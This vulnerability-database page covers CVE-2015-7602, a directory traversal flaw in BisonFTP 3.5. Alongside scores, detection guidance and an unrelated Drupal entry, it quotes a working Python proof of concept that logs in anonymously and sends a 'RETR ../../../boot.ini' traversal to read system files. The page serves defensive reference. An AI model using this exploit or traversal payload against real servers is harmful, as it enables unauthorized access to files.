CVE-2015-7602
published 2015-09-29CVE-2015-7602: Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.
PriorityP265high7.8CVSS 2.0
AVNACLAuNCCINAN
EXPLOIT
EPSS
60.94%
99.0th percentile
Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bisonware | bisonftp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect FTP RETR commands containing directory traversal sequences (e.g., '../', '..//.') targeting BisonFTP 3.5 servers ↗
- →Monitor FTP sessions for unauthenticated or anonymous logins followed by RETR commands with traversal strings — the PoC calls ftp.login() with no credentials before issuing the traversal RETR ↗
- →Alert on FTP RETR requests for sensitive Windows files (e.g., boot.ini) combined with path traversal sequences as an indicator of active exploitation ↗
- ·Vulnerability is specific to BisonWare BisonFTP Server version 3.5 only; other versions are not confirmed affected ↗
- ·The PoC exploit was tested exclusively on Windows XP Service Pack 3 (English); traversal path depth and target file paths may differ on other Windows versions ↗
CVSS provenance
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
osv3.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-872p-8wgh-9j64: Directory traversal vulnerability in BisonWare BisonFTP 3
ghsa_unreviewed·2022-05-17
CVE-2015-7602 [HIGH] CWE-22 GHSA-872p-8wgh-9j64: Directory traversal vulnerability in BisonWare BisonFTP 3
Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.
OSV
drupal7 vulnerabilities
osv·2021-03-15·CVSS 3.5
CVE-2018-7600 drupal7 vulnerabilities
drupal7 vulnerabilities
It was discovered that Drupal did not properly process certain input. An
attacker could use this vulnerability to execute arbitrary code or
completely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)
It was discovered that password reset URLs in Drupal could be forged. An
attacker could use this vulnerability to gain access to another user's
account. This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2559)
It was discovered that Drupal did not properly protect against open
redirects. An attacker could use this vulnerability to send unsuspecting
users to 3rd party sites and potentially carry out phishing attacks.
This issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)
No detection rules found.
Exploit-DB
BisonWare BisonFTP Server 3.5 - Directory Traversal
exploitdb·2015-09-28
CVE-2015-7602 BisonWare BisonFTP Server 3.5 - Directory Traversal
BisonWare BisonFTP Server 3.5 - Directory Traversal
---
#!/usr/bin/python
# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability
# author: Jay Turla
# tested on Windows XP Service Pack 3 - English
# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar
# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC)
from ftplib import FTP
ftp = FTP(raw_input("Target IP: "))
ftp.login()
ftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)
ftp.close()
file = open('boot.ini.txt', 'r')
print "[**] Printing what's inside boot.ini\n"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print file.read()
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Metasploit
BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
metasploit
BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'
No writeups or analysis indexed.
2015-09-29
Published